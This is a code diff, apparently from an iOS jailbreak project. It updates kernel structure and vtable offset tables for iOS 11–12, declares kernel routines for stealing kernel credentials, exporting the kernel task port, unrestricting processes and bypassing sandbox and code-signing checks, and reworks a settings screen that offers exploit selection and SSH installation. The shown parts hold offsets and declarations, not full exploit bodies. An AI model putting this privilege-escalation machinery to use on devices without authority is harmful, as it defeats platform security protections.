    /* struct task */
    KSTRUCT_OFFSET_TASK_LCK_MTX_TYPE,
    KSTRUCT_OFFSET_TASK_REF_COUNT,
@@ -39,6 +39,8 @@ enum kstruct_offset {
    KSTRUCT_OFFSET_PROC_P_MEMSTAT_STATE,
    KSTRUCT_OFFSET_PROC_MLOCK,
    KSTRUCT_OFFSET_PROC_UCRED_MLOCK,
+    KSTRUCT_OFFSET_PROC_SVUID,
+    KSTRUCT_OFFSET_PROC_SVGID,

    /* struct filedesc */
    KSTRUCT_OFFSET_FILEDESC_FD_OFILES,
@@ -77,6 +79,7 @@ enum kstruct_offset {
    KSTRUCT_OFFSET_HOST_SPECIAL,
    
    /* struct ucred */
+    KSTRUCT_OFFSET_UCRED_CR_REF,
    KSTRUCT_OFFSET_UCRED_CR_UID,
    KSTRUCT_OFFSET_UCRED_CR_RUID,
    KSTRUCT_OFFSET_UCRED_CR_SVUID,
@@ -94,10 +97,32 @@ enum kstruct_offset {
    
    /* struct ipc_entry */
    KSTRUCT_SIZE_IPC_ENTRY,
+    KSTRUCT_OFFSET_IPC_ENTRY_IE_BITS,
+    
+    /* struct vnode */
+    KSTRUCT_OFFSET_VNODE_V_FLAG,
+    
+    /* vtable OSDictionary */
+    KVTABLE_OFFSET_OSDICTIONARY_SETOBJECTWITHCHARP,
+    KVTABLE_OFFSET_OSDICTIONARY_GETOBJECTWITHCHARP,
+    KVTABLE_OFFSET_OSDICTIONARY_MERGE,
+    
+    /* vtable OSArray */
+    KVTABLE_OFFSET_OSARRAY_MERGE,
+    KVTABLE_OFFSET_OSARRAY_REMOVEOBJECT,
+    KVTABLE_OFFSET_OSARRAY_GETOBJECT,
+    
+    /* vtable OSObject */
+    KVTABLE_OFFSET_OSOBJECT_RELEASE,
+    KVTABLE_OFFSET_OSOBJECT_GETRETAINCOUNT,
+    KVTABLE_OFFSET_OSOBJECT_RETAIN,
+    
+    /* vtable OSString */
+    KVTABLE_OFFSET_OSSTRING_GETLENGTH,
    
    KFREE_ADDR_OFFSET,
 };

-uint32_t koffset(enum kstruct_offset offset);
+uint32_t koffset(enum kernel_offset offset);

 #endif
@@ -6,13 +6,13 @@
 #include <sys/sysctl.h>
 #include <sys/utsname.h>

-#include "KernelStructureOffsets.h"
+#include "KernelOffsets.h"
 #include <common.h>
 #include "utils.h"

 uint32_t* offsets = NULL;

-uint32_t kstruct_offsets_11_0[] = {
+uint32_t kernel_offsets_11_0[] = {
    0xb, // KSTRUCT_OFFSET_TASK_LCK_MTX_TYPE
    0x10, // KSTRUCT_OFFSET_TASK_REF_COUNT
    0x14, // KSTRUCT_OFFSET_TASK_ACTIVE
@@ -45,6 +45,8 @@ uint32_t kstruct_offsets_11_0[] = {
    0x410, // KSTRUCT_OFFSET_PROC_P_MEMSTAT_STATE
    0x58, // KSTRUCT_OFFSET_PROC_MLOCK
    0xf0, // KSTRUCT_OFFSET_PROC_UCRED_MLOCK
+    0x40, // KSTRUCT_OFFSET_PROC_SVUID
+    0x44, // KSTRUCT_OFFSET_PROC_SVGID

    0x0, // KSTRUCT_OFFSET_FILEDESC_FD_OFILES

@@ -72,6 +74,7 @@ uint32_t kstruct_offsets_11_0[] = {

    0x10, // KSTRUCT_OFFSET_HOST_SPECIAL
    
+    0x10, // KSTRUCT_OFFSET_UCRED_CR_REF
    0x18, // KSTRUCT_OFFSET_UCRED_CR_UID
    0x1c, // KSTRUCT_OFFSET_UCRED_CR_RUID
    0x20, // KSTRUCT_OFFSET_UCRED_CR_SVUID
@@ -87,11 +90,28 @@ uint32_t kstruct_offsets_11_0[] = {
    0x8, // KSTRUCT_OFFSET_LABEL_L_PERPOLICY
    
    0x18, // KSTRUCT_SIZE_IPC_ENTRY
+    0x8, // KSTRUCT_OFFSET_IPC_ENTRY_IE_BITS
+    
+    0x54, // KSTRUCT_OFFSET_VNODE_V_FLAG
+    
+    0x1F, // KVTABLE_OFFSET_OSDICTIONARY_SETOBJECTWITHCHARP
+    0x26, // KVTABLE_OFFSET_OSDICTIONARY_GETOBJECTWITHCHARP
+    0x23, // KVTABLE_OFFSET_OSDICTIONARY_MERGE
+    
+    0x1E, // KVTABLE_OFFSET_OSARRAY_MERGE
+    0x20, // KVTABLE_OFFSET_OSARRAY_REMOVEOBJECT
+    0x22, // KVTABLE_OFFSET_OSARRAY_GETOBJECT
+    
+    0x05, // KVTABLE_OFFSET_OSOBJECT_RELEASE
+    0x03, // KVTABLE_OFFSET_OSOBJECT_GETRETAINCOUNT
+    0x04, // KVTABLE_OFFSET_OSOBJECT_RETAIN
+    
+    0x11, // KVTABLE_OFFSET_OSSTRING_GETLENGTH
    
    0x6c, // KFREE_ADDR_OFFSET
 };

-uint32_t kstruct_offsets_11_3[] = {
+uint32_t kernel_offsets_11_3[] = {
    0xb, // KSTRUCT_OFFSET_TASK_LCK_MTX_TYPE
    0x10, // KSTRUCT_OFFSET_TASK_REF_COUNT
    0x14, // KSTRUCT_OFFSET_TASK_ACTIVE
@@ -124,6 +144,8 @@ uint32_t kstruct_offsets_11_3[] = {
    0x410, // KSTRUCT_OFFSET_PROC_P_MEMSTAT_STATE
    0x58, // KSTRUCT_OFFSET_PROC_MLOCK
    0xf0, // KSTRUCT_OFFSET_PROC_UCRED_MLOCK
+    0x40, // KSTRUCT_OFFSET_PROC_SVUID
+    0x44, // KSTRUCT_OFFSET_PROC_SVGID

    0x0, // KSTRUCT_OFFSET_FILEDESC_FD_OFILES

@@ -151,6 +173,7 @@ uint32_t kstruct_offsets_11_3[] = {

    0x10, // KSTRUCT_OFFSET_HOST_SPECIAL

+    0x10, // KSTRUCT_OFFSET_UCRED_CR_REF
    0x18, // KSTRUCT_OFFSET_UCRED_CR_UID
    0x1c, // KSTRUCT_OFFSET_UCRED_CR_RUID
    0x20, // KSTRUCT_OFFSET_UCRED_CR_SVUID
@@ -166,11 +189,28 @@ uint32_t kstruct_offsets_11_3[] = {
    0x8, // KSTRUCT_OFFSET_LABEL_L_PERPOLICY
    
    0x18, // KSTRUCT_SIZE_IPC_ENTRY
+    0x8, // KSTRUCT_OFFSET_IPC_ENTRY_IE_BITS
+    
+    0x54, // KSTRUCT_OFFSET_VNODE_V_FLAG
+    
+    0x1F, // KVTABLE_OFFSET_OSDICTIONARY_SETOBJECTWITHCHARP
+    0x26, // KVTABLE_OFFSET_OSDICTIONARY_GETOBJECTWITHCHARP
+    0x23, // KVTABLE_OFFSET_OSDICTIONARY_MERGE
+    
+    0x1E, // KVTABLE_OFFSET_OSARRAY_MERGE
+    0x20, // KVTABLE_OFFSET_OSARRAY_REMOVEOBJECT
+    0x22, // KVTABLE_OFFSET_OSARRAY_GETOBJECT
+    
+    0x05, // KVTABLE_OFFSET_OSOBJECT_RELEASE
+    0x03, // KVTABLE_OFFSET_OSOBJECT_GETRETAINCOUNT
+    0x04, // KVTABLE_OFFSET_OSOBJECT_RETAIN
+    
+    0x11, // KVTABLE_OFFSET_OSSTRING_GETLENGTH
    
    0x6c, // KFREE_ADDR_OFFSET
 };

-uint32_t kstruct_offsets_12_0[] = {
+uint32_t kernel_offsets_12_0[] = {
    0xb, // KSTRUCT_OFFSET_TASK_LCK_MTX_TYPE
    0x10, // KSTRUCT_OFFSET_TASK_REF_COUNT
    0x14, // KSTRUCT_OFFSET_TASK_ACTIVE
@@ -211,7 +251,7 @@ uint32_t kstruct_offsets_12_0[] = {
    0xa0, // KSTRUCT_OFFSET_IPC_PORT_IP_SRIGHTS
    
    0x60, // KSTRUCT_OFFSET_PROC_PID
-    0x108, // KSTRUCT_OFFSET_PROC_P_FD
+    0x100, // KSTRUCT_OFFSET_PROC_P_FD
    0x10, // KSTRUCT_OFFSET_PROC_TASK
    0xf8, // KSTRUCT_OFFSET_PROC_UCRED
    0x0, // KSTRUCT_OFFSET_PROC_P_LIST
@@ -219,6 +259,8 @@ uint32_t kstruct_offsets_12_0[] = {
    0x3f8, // KSTRUCT_OFFSET_PROC_P_MEMSTAT_STATE
    0x50, // KSTRUCT_OFFSET_PROC_MLOCK
    0xe8, // KSTRUCT_OFFSET_PROC_UCRED_MLOCK
+    0x32, // KSTRUCT_OFFSET_PROC_SVUID
+    0x36, // KSTRUCT_OFFSET_PROC_SVGID
    
    0x0, // KSTRUCT_OFFSET_FILEDESC_FD_OFILES
    
@@ -246,6 +288,7 @@ uint32_t kstruct_offsets_12_0[] = {
    
    0x10, // KSTRUCT_OFFSET_HOST_SPECIAL
    
+    0x10, // KSTRUCT_OFFSET_UCRED_CR_REF
    0x18, // KSTRUCT_OFFSET_UCRED_CR_UID
    0x1c, // KSTRUCT_OFFSET_UCRED_CR_RUID
    0x20, // KSTRUCT_OFFSET_UCRED_CR_SVUID
@@ -261,24 +304,41 @@ uint32_t kstruct_offsets_12_0[] = {
    0x8, // KSTRUCT_OFFSET_LABEL_L_PERPOLICY
    
    0x18, // KSTRUCT_SIZE_IPC_ENTRY
+    0x8, // KSTRUCT_OFFSET_IPC_ENTRY_IE_BITS
+    
+    0x54, // KSTRUCT_OFFSET_VNODE_V_FLAG
+    
+    0x1F, // KVTABLE_OFFSET_OSDICTIONARY_SETOBJECTWITHCHARP
+    0x26, // KVTABLE_OFFSET_OSDICTIONARY_GETOBJECTWITHCHARP
+    0x23, // KVTABLE_OFFSET_OSDICTIONARY_MERGE
+    
+    0x1E, // KVTABLE_OFFSET_OSARRAY_MERGE
+    0x20, // KVTABLE_OFFSET_OSARRAY_REMOVEOBJECT
+    0x22, // KVTABLE_OFFSET_OSARRAY_GETOBJECT
+    
+    0x05, // KVTABLE_OFFSET_OSOBJECT_RELEASE
+    0x03, // KVTABLE_OFFSET_OSOBJECT_GETRETAINCOUNT
+    0x04, // KVTABLE_OFFSET_OSOBJECT_RETAIN
+    
+    0x11, // KVTABLE_OFFSET_OSSTRING_GETLENGTH
    
    0x6c, // KFREE_ADDR_OFFSET
 };

-uint32_t koffset(enum kstruct_offset offset)
+uint32_t koffset(enum kernel_offset offset)
 {
    static dispatch_once_t onceToken;
    dispatch_once(&onceToken, ^{
        LOG("kCFCoreFoundationVersionNumber: %f", kCFCoreFoundationVersionNumber);
-        if (kCFCoreFoundationVersionNumber >= 1535.12) {
+        if (kCFCoreFoundationVersionNumber >= kCFCoreFoundationVersionNumber_iOS_12_0) {
            LOG("offsets selected for iOS 12.0 or above");
-            offsets = kstruct_offsets_12_0;
-        } else if (kCFCoreFoundationVersionNumber >= 1452.23) {
+            offsets = kernel_offsets_12_0;
+        } else if (kCFCoreFoundationVersionNumber >= kCFCoreFoundationVersionNumber_iOS_11_3) {
            LOG("offsets selected for iOS 11.3 or above");
-            offsets = kstruct_offsets_11_3;
-        } else if (kCFCoreFoundationVersionNumber >= 1443.00) {
+            offsets = kernel_offsets_11_3;
+        } else if (kCFCoreFoundationVersionNumber >= kCFCoreFoundationVersionNumber_iOS_11_0) {
            LOG("offsets selected for iOS 11.0 to 11.2.6");
-            offsets = kstruct_offsets_11_0;
+            offsets = kernel_offsets_11_0;
        } else {
            LOG("iOS version too low, 11.0 required");
            offsets = NULL;
@@ -4,59 +4,178 @@
 #include <common.h>
 #include <mach/mach.h>
 #include <offsetcache.h>
+#include <stdbool.h>

-#define SETOFFSET(offset, val) set_offset(#offset, val)
-#define GETOFFSET(offset) get_offset(#offset)
+#if 0
+Credits:
+- https://stek29.rocks/2018/01/26/sandbox.html
+- https://stek29.rocks/2018/12/11/shenanigans.html
+- http://newosxbook.com/QiLin/qilin.pdf
+- https://github.com/Siguza/v0rtex/blob/e6d54c97715d6dbcdda8b9a8090484a7a47019d0/src/v0rtex.m#L1623
+#endif

-#define ISADDR(val) ((val) >= 0xffff000000000000 && (val) != 0xffffffffffffffff)
+#if 0
+TODO:
+- Patchfind proc_lock (High priority)
+- Patchfind proc_unlock (High priority)
+- Patchfind proc_ucred_lock (High priority)
+- Patchfind proc_ucred_unlock (High priority)
+- Patchfind vnode_lock (Low priority)
+- Patchfind vnode_unlock (Low priority)
+- Patchfind mount_lock (Low priority)
+- Patchfind mount_unlock (Low priority)
+- Patchfind task_set_platform_binary (High priority)
+- Patchfind kauth_cred_ref (Low priority)
+- Patchfind kauth_cred_unref (Low priority)
+- Patchfind chgproccnt (Low priority)
+- Patchfind kauth_cred_ref (Low priority)
+- Patchfind kauth_cred_unref (Low priority)
+- Patchfind extension_destroy (Low priority)
+- Patchfind extension_create_mach (Middle priority)
+- Use offsetof with XNU headers to find structure offsets (Low priority)
+- Update Unrestrict to implement the kernel calls
+#endif

-extern uint64_t kernel_base;
+#define setoffset(offset, val) set_offset(#offset, val)
+#define getoffset(offset) get_offset(#offset)
+
+#define OSBoolTrue getOSBool(true)
+#define OSBoolFalse getOSBool(false)
+
+extern kptr_t kernel_base;
 extern uint64_t kernel_slide;

-extern uint64_t cached_task_self_addr;
+extern kptr_t cached_proc_struct_addr;
+extern kptr_t cached_task_self_addr;
 extern bool found_offsets;

-uint64_t task_self_addr(void);
-uint64_t ipc_space_kernel(void);
-uint64_t find_kernel_base(void);
+kptr_t task_self_addr(void);
+kptr_t ipc_space_kernel(void);
+kptr_t find_kernel_base(void);

-uint64_t current_thread(void);
+kptr_t current_thread(void);

 mach_port_t fake_host_priv(void);

 int message_size_for_kalloc_size(int kalloc_size);

-uint64_t get_kernel_proc_struct_addr(void);
-void iterate_proc_list(void (^handler)(uint64_t, pid_t, bool *));
-uint64_t get_proc_struct_for_pid(pid_t pid);
-uint64_t get_address_of_port(pid_t pid, mach_port_t port);
-uint64_t get_kernel_cred_addr(void);
-uint64_t give_creds_to_process_at_addr(uint64_t proc, uint64_t cred_addr);
-void set_platform_binary(uint64_t proc, bool set);
+kptr_t get_kernel_proc_struct_addr(void);
+bool iterate_proc_list(void (^handler)(kptr_t, pid_t, bool *));
+kptr_t get_proc_struct_for_pid(pid_t pid);
+kptr_t proc_struct_addr(void);
+kptr_t get_address_of_port(kptr_t proc, mach_port_t port);
+kptr_t get_kernel_cred_addr(void);
+kptr_t give_creds_to_process_at_addr(kptr_t proc, kptr_t cred_addr);
+bool set_platform_binary(kptr_t proc, bool set);

-uint64_t zm_fix_addr(uint64_t addr);
+kptr_t zm_fix_addr(kptr_t addr);

 bool verify_tfp0(void);

-extern int (*pmap_load_trust_cache)(uint64_t kernel_trust, size_t length);
-int _pmap_load_trust_cache(uint64_t kernel_trust, size_t length);
+extern int (*pmap_load_trust_cache)(kptr_t kernel_trust, size_t length);
+int _pmap_load_trust_cache(kptr_t kernel_trust, size_t length);

-void set_host_type(host_t host, uint32_t type);
-void export_tfp0(host_t host);
-void unexport_tfp0(host_t host);
+bool set_host_type(host_t host, uint32_t type);
+bool export_tfp0(host_t host);
+bool unexport_tfp0(host_t host);

-void set_csflags(uint64_t proc, uint32_t flags, bool value);
-void set_cs_platform_binary(uint64_t proc, bool value);
+bool set_csflags(kptr_t proc, uint32_t flags, bool value);
+bool set_cs_platform_binary(kptr_t proc, bool value);

-bool execute_with_credentials(uint64_t proc, uint64_t credentials, void (^function)(void));
+bool execute_with_credentials(kptr_t proc, kptr_t credentials, void (^function)(void));

-uint32_t get_proc_memstat_state(uint64_t proc);
-void set_proc_memstat_state(uint64_t proc, uint32_t memstat_state);
-void set_proc_memstat_internal(uint64_t proc, bool set);
-bool get_proc_memstat_internal(uint64_t proc);
-void vnode_lock(uint64_t vp);
-void vnode_unlock(uint64_t vp);
-void mount_lock(uint64_t mp);
-void mount_unlock(uint64_t mp);
+uint32_t get_proc_memstat_state(kptr_t proc);
+bool set_proc_memstat_state(kptr_t proc, uint32_t memstat_state);
+bool set_proc_memstat_internal(kptr_t proc, bool set);
+bool get_proc_memstat_internal(kptr_t proc);
+size_t kstrlen(kptr_t ptr);
+kptr_t sstrdup(const char *str);
+kptr_t smalloc(size_t size);
+void sfree(kptr_t ptr);
+kptr_t IOMalloc(vm_size_t size);
+void IOFree(kptr_t address, vm_size_t size);
+int extension_create_file(kptr_t saveto, kptr_t sb, const char *path, size_t path_len, uint32_t subtype);
+int extension_create_mach(kptr_t saveto, kptr_t sb, const char *name, uint32_t subtype);
+int extension_add(kptr_t ext, kptr_t sb, const char *desc);
+void extension_release(kptr_t ext);
+void extension_destroy(kptr_t ext);
+bool set_file_extension(kptr_t sandbox, const char *exc_key, const char *path);
+bool set_mach_extension(kptr_t sandbox, const char *exc_key, const char *name);
+kptr_t proc_find(pid_t pid);
+void proc_rele(kptr_t proc);
+void proc_lock(kptr_t proc);
+void proc_unlock(kptr_t proc);
+void proc_ucred_lock(kptr_t proc);
+void proc_ucred_unlock(kptr_t proc);
+void vnode_lock(kptr_t vp);
+void vnode_unlock(kptr_t vp);
+void mount_lock(kptr_t mp);
+void mount_unlock(kptr_t mp);
+void task_set_platform_binary(kptr_t task, boolean_t is_platform);
+void kauth_cred_ref(kptr_t cred);
+void kauth_cred_unref(kptr_t cred);
+int chgproccnt(uid_t uid, int diff);
+kptr_t vfs_context_current(void);
+int vnode_lookup(const char *path, int flags, kptr_t *vpp, kptr_t ctx);
+int vnode_getfromfd(kptr_t ctx, int fd, kptr_t *vpp);
+int vn_getpath(kptr_t vp, char *pathbuf, int *len);
+int vnode_put(kptr_t vp);
+bool OSDictionary_SetItem(kptr_t OSDictionary, const char *key, kptr_t val);
+kptr_t OSDictionary_GetItem(kptr_t OSDictionary, const char *key);
+bool OSDictionary_Merge(kptr_t OSDictionary, kptr_t OSDictionary2);
+uint32_t OSDictionary_ItemCount(kptr_t OSDictionary);
+kptr_t OSDictionary_ItemBuffer(kptr_t OSDictionary);
+kptr_t OSDictionary_ItemKey(kptr_t buffer, uint32_t idx);
+kptr_t OSDictionary_ItemValue(kptr_t buffer, uint32_t idx);
+uint32_t OSArray_ItemCount(kptr_t OSArray);
+bool OSArray_Merge(kptr_t OSArray, kptr_t OSArray2);
+kptr_t OSArray_GetObject(kptr_t OSArray, uint32_t idx);
+void OSArray_RemoveObject(kptr_t OSArray, uint32_t idx);
+kptr_t OSArray_ItemBuffer(kptr_t OSArray);
+kptr_t OSObjectFunc(kptr_t OSObject, uint32_t off);
+void OSObject_Release(kptr_t OSObject);
+void OSObject_Retain(kptr_t OSObject);
+uint32_t OSObject_GetRetainCount(kptr_t OSObject);
+uint32_t OSString_GetLength(kptr_t OSString);
+kptr_t OSString_CStringPtr(kptr_t OSString);
+char *OSString_CopyString(kptr_t OSString);
+kptr_t OSUnserializeXML(const char *buffer);
+kptr_t get_exception_osarray(const char **exceptions, bool is_file_extension);
+char **copy_amfi_entitlements(kptr_t present);
+kptr_t getOSBool(bool value);
+bool entitle_process(kptr_t amfi_entitlements, const char *key, kptr_t val);
+bool set_sandbox_exceptions(kptr_t sandbox);
+bool check_for_exception(char **current_exceptions, const char *exception);
+bool set_amfi_exceptions(kptr_t amfi_entitlements, const char *exc_key, const char **exceptions, bool is_file_extension);
+bool set_exceptions(kptr_t sandbox, kptr_t amfi_entitlements);
+kptr_t get_amfi_entitlements(kptr_t cr_label);
+kptr_t get_sandbox(kptr_t cr_label);
+bool entitle_process_with_pid(pid_t pid, const char *key, kptr_t val);
+bool remove_memory_limit(void);
+bool restore_kernel_task_port(task_t *out_kernel_task_port);
+bool restore_kernel_base(uint64_t *out_kernel_base, uint64_t *out_kernel_slide);
+bool restore_kernel_offset_cache(void);
+bool restore_file_offset_cache(const char *offset_cache_file_path, kptr_t *out_kernel_base, uint64_t *out_kernel_slide);
+bool convert_port_to_task_port(mach_port_t port, kptr_t space, kptr_t task_kaddr);
+kptr_t make_fake_task(kptr_t vm_map);
+bool make_port_fake_task_port(mach_port_t port, kptr_t task_kaddr);
+bool set_hsp4(task_t port);
+kptr_t get_vnode_for_path(const char *path);
+kptr_t get_vnode_for_fd(int fd);
+char *get_path_for_fd(int fd);
+kptr_t get_vnode_for_snapshot(int fd, char *name);
+bool set_kernel_task_info(void);
+int issue_extension_for_mach_service(kptr_t sb, kptr_t ctx, const char *entry_name, void *desc);
+bool unrestrict_process(pid_t pid);
+bool unrestrict_process_with_task_port(task_t task_port);
+bool unrestrict_library(const char *path);
+bool unrestrict_library_with_fd(int fd);
+bool revalidate_process(pid_t pid);
+bool revalidate_process_with_task_port(task_t task_port);
+bool enable_mapping_for_library(const char *lib);
+bool enable_mapping_for_libraries(const char *libs);
+kptr_t find_vnode_with_fd(kptr_t proc, int fd);
+kptr_t find_vnode_with_path(const char *path);
+kptr_t swap_sandbox_for_proc(kptr_t proc, kptr_t sandbox);

 #endif /* kutils_h */
@@ -10,59 +10,94 @@
 #import "common.h"
 #import "utils.h"

-#define K_TWEAK_INJECTION          @"TweakInjection"
-#define K_LOAD_DAEMONS             @"LoadDaemons"
-#define K_DUMP_APTICKET            @"DumpAPTicket"
-#define K_REFRESH_ICON_CACHE       @"RefreshIconCache"
-#define K_BOOT_NONCE               @"BootNonce"
-#define K_EXPLOIT                  @"Exploit"
-#define K_DISABLE_AUTO_UPDATES     @"DisableAutoUpdates"
-#define K_DISABLE_APP_REVOKES      @"DisableAppRevokes"
-#define K_OVERWRITE_BOOT_NONCE     @"OverwriteBootNonce"
-#define K_EXPORT_KERNEL_TASK_PORT  @"ExportKernelTaskPort"
-#define K_RESTORE_ROOTFS           @"RestoreRootFS"
-#define K_INCREASE_MEMORY_LIMIT    @"IncreaseMemoryLimit"
-#define K_ECID                     @"Ecid"
-#define K_INSTALL_OPENSSH          @"InstallOpenSSH"
-#define K_INSTALL_CYDIA            @"InstallCydia"
-#define K_RELOAD_SYSTEM_DAEMONS    @"ReloadSystemDaemons"
-#define K_HIDE_LOG_WINDOW          @"HideLogWindow"
-#define K_RESET_CYDIA_CACHE        @"ResetCydiaCache"
-#define K_SSH_ONLY                 @"SSHOnly"
-#define K_ENABLE_GET_TASK_ALLOW    @"EnableGetTaskAllow"
-#define K_SET_CS_DEBUGGED          @"SetCSDebugged"
-
-@interface SettingsTableViewController : UITableViewController <UITextFieldDelegate>
-@property (weak, nonatomic) IBOutlet UISwitch *TweakInjectionSwitch;
-@property (weak, nonatomic) IBOutlet UISwitch *LoadDaemonsSwitch;
-@property (weak, nonatomic) IBOutlet UISwitch *DumpAPTicketSwitch;
-@property (weak, nonatomic) IBOutlet UISwitch *RefreshIconCacheSwitch;
-@property (weak, nonatomic) IBOutlet UITextField *BootNonceTextField;
-@property (weak, nonatomic) IBOutlet UISegmentedControl *KernelExploitSegmentedControl;
+@interface SettingsTableViewController : UITableViewController  <UITextFieldDelegate, UIPickerViewDataSource, UIPickerViewDelegate>
+@property (weak, nonatomic) IBOutlet UISwitch *tweakInjectionSwitch;
+@property (weak, nonatomic) IBOutlet UISwitch *loadDaemonsSwitch;
+@property (weak, nonatomic) IBOutlet UISwitch *dumpAPTicketSwitch;
+@property (weak, nonatomic) IBOutlet UISwitch *refreshIconCacheSwitch;
+@property (weak, nonatomic) IBOutlet UITextField *bootNonceTextField;
+@property (weak, nonatomic) IBOutlet UITextField *kernelExploitTextField;
+@property (nonatomic) UIPickerView *kernelExploitPickerView;
+@property (nonatomic) NSMutableArray *exploitPickerArray;
+@property (nonatomic) NSMutableDictionary *availableExploits;
+@property (nonatomic) UIToolbar *exploitPickerToolbar;
+@property (weak, nonatomic) IBOutlet UITextField *codeSubstitutorTextField;
+@property (nonatomic) UIPickerView *codeSubstitutorPickerView;
+@property (nonatomic) NSMutableArray *substitutorPickerArray;
+@property (nonatomic) NSMutableDictionary *availableSubstitutors;
+@property (nonatomic) UIToolbar *substitutorPickerToolbar;
+@property (nonatomic) BOOL isPicking;
@property (weak, nonatomic) IBOutlet UIButton *restartButton;
-@property (weak, nonatomic) IBOutlet UISwitch *DisableAutoUpdatesSwitch;
-@property (weak, nonatomic) IBOutlet UISwitch *DisableAppRevokesSwitch;
+@property (weak, nonatomic) IBOutlet UISwitch *disableAutoUpdatesSwitch;
+@property (weak, nonatomic) IBOutlet UISwitch *disableAppRevokesSwitch;
@property (nonatomic) UITapGestureRecognizer *tap;
-@property (weak, nonatomic) IBOutlet UIButton *ShareDiagnosticsDataButton;
-@property (weak, nonatomic) IBOutlet UIButton *OpenCydiaButton;
-@property (weak, nonatomic) IBOutlet UITextField *ExpiryLabel;
-@property (weak, nonatomic) IBOutlet UISwitch *OverwriteBootNonceSwitch;
-@property (weak, nonatomic) IBOutlet UISwitch *ExportKernelTaskPortSwitch;
-@property (weak, nonatomic) IBOutlet UISwitch *RestoreRootFSSwitch;
+@property (weak, nonatomic) IBOutlet UIButton *shareDiagnosticsDataButton;
+@property (weak, nonatomic) IBOutlet UIButton *openCydiaButton;
+@property (weak, nonatomic) IBOutlet UITextField *expiryLabel;
+@property (weak, nonatomic) IBOutlet UISwitch *overwriteBootNonceSwitch;
+@property (weak, nonatomic) IBOutlet UISwitch *exportKernelTaskPortSwitch;
+@property (weak, nonatomic) IBOutlet UISwitch *restoreRootFSSwitch;
@property (weak, nonatomic) IBOutlet UISwitch *installCydiaSwitch;
@property (weak, nonatomic) IBOutlet UISwitch *installSSHSwitch;
-@property (weak, nonatomic) IBOutlet UITextField *UptimeLabel;
-@property (weak, nonatomic) IBOutlet UISwitch *IncreaseMemoryLimitSwitch;
-@property (weak, nonatomic) IBOutlet UITextField *ECIDLabel;
-@property (weak, nonatomic) IBOutlet UISwitch *ReloadSystemDaemonsSwitch;
-@property (weak, nonatomic) IBOutlet UIButton *RestartSpringBoardButton;
-@property (weak, nonatomic) IBOutlet UISwitch *HideLogWindowSwitch;
-@property (weak, nonatomic) IBOutlet UISwitch *ResetCydiaCacheSwitch;
-@property (weak, nonatomic) IBOutlet UISwitch *SSHOnlySwitch;
-@property (weak, nonatomic) IBOutlet UISwitch *EnableGetTaskAllowSwitch;
-@property (weak, nonatomic) IBOutlet UISwitch *SetCSDebuggedSwitch;
+@property (weak, nonatomic) IBOutlet UITextField *uptimeLabel;
+@property (weak, nonatomic) IBOutlet UISwitch *increaseMemoryLimitSwitch;
+@property (weak, nonatomic) IBOutlet UITextField *ecidLabel;
+@property (weak, nonatomic) IBOutlet UISwitch *reloadSystemDaemonsSwitch;
+@property (weak, nonatomic) IBOutlet UIButton *restartSpringBoardButton;
+@property (weak, nonatomic) IBOutlet UISwitch *hideLogWindowSwitch;
+@property (weak, nonatomic) IBOutlet UISwitch *resetCydiaCacheSwitch;
+@property (weak, nonatomic) IBOutlet UISwitch *sshOnlySwitch;
+@property (weak, nonatomic) IBOutlet UISwitch *enableGetTaskAllowSwitch;
+@property (weak, nonatomic) IBOutlet UISwitch *setCSDebuggedSwitch;
+@property (weak, nonatomic) IBOutlet UISwitch *autoRespringSwitch;

-+ (NSDictionary *)_provisioningProfileAtPath:(NSString *)path;
+@property (weak, nonatomic) IBOutlet UILabel *specialThanksLabel;
+@property (weak, nonatomic) IBOutlet UILabel *tweakInjectionLabel;
+@property (weak, nonatomic) IBOutlet UILabel *loadDaemonsLabel;
+@property (weak, nonatomic) IBOutlet UILabel *dumpAPTicketLabel;
+@property (weak, nonatomic) IBOutlet UILabel *refreshIconCacheLabel;
+@property (weak, nonatomic) IBOutlet UILabel *disableAutoUpdatesLabel;
+@property (weak, nonatomic) IBOutlet UILabel *disableAppRevokesLabel;
+@property (weak, nonatomic) IBOutlet UILabel *overwriteBootNonceLabel;
+@property (weak, nonatomic) IBOutlet UILabel *exportKernelTaskPortLabel;
+@property (weak, nonatomic) IBOutlet UILabel *restoreRootFSLabel;
+@property (weak, nonatomic) IBOutlet UILabel *installCydiaLabel;
+@property (weak, nonatomic) IBOutlet UILabel *installSSHLabel;
+@property (weak, nonatomic) IBOutlet UILabel *increaseMemoryLimitLabel;
+@property (weak, nonatomic) IBOutlet UILabel *reloadSystemDaemonsLabel;
+@property (weak, nonatomic) IBOutlet UILabel *hideLogWindowLabel;
+@property (weak, nonatomic) IBOutlet UILabel *resetCydiaCacheLabel;
+@property (weak, nonatomic) IBOutlet UILabel *sshOnlyLabel;
+@property (weak, nonatomic) IBOutlet UILabel *enableGetTaskAllowLabel;
+@property (weak, nonatomic) IBOutlet UILabel *setCSDebuggedLabel;
+@property (weak, nonatomic) IBOutlet UILabel *autoRespringLabel;
+@property (weak, nonatomic) IBOutlet UILabel *kernelExploitLabel;
+@property (weak, nonatomic) IBOutlet UILabel *codeSubstitutorLabel;
+@property (weak, nonatomic) IBOutlet UIButton *bootNonceButton;
+@property (weak, nonatomic) IBOutlet UIButton *ecidDarkModeButton;
+@property (weak, nonatomic) IBOutlet UILabel *expiryDarkModeLabel;
+@property (weak, nonatomic) IBOutlet UILabel *upTimeLabel;
+@property (weak, nonatomic) IBOutlet UIButton *loadTweaksInfoButton;
+@property (weak, nonatomic) IBOutlet UIButton *loadDaemonsInfoButton;
+@property (weak, nonatomic) IBOutlet UIButton *dumpAPTicketInfoButton;
+@property (weak, nonatomic) IBOutlet UIButton *refreshIconCacheInfoButton;
+@property (weak, nonatomic) IBOutlet UIButton *disableAutoUpdatesInfoButton;
+@property (weak, nonatomic) IBOutlet UIButton *disableAppRevokesInfoButton;
+@property (weak, nonatomic) IBOutlet UIButton *overwriteBootNonceInfoButton;
+@property (weak, nonatomic) IBOutlet UIButton *exportKernelTaskPortInfoButton;
+@property (weak, nonatomic) IBOutlet UIButton *restoreRootFSInfoButton;
+@property (weak, nonatomic) IBOutlet UIButton *increaseMemoryLimitInfoButton;
+@property (weak, nonatomic) IBOutlet UIButton *installSSHInfoButton;
+@property (weak, nonatomic) IBOutlet UIButton *installCydiaInfoButton;
+@property (weak, nonatomic) IBOutlet UIButton *reloadSystemDaemonsInfoButton;
+@property (weak, nonatomic) IBOutlet UIButton *hideLogWindowInfoButton;
+@property (weak, nonatomic) IBOutlet UIButton *resetCydiaSwitchInfoButton;
+@property (weak, nonatomic) IBOutlet UIButton *sshOnlyInfoButton;
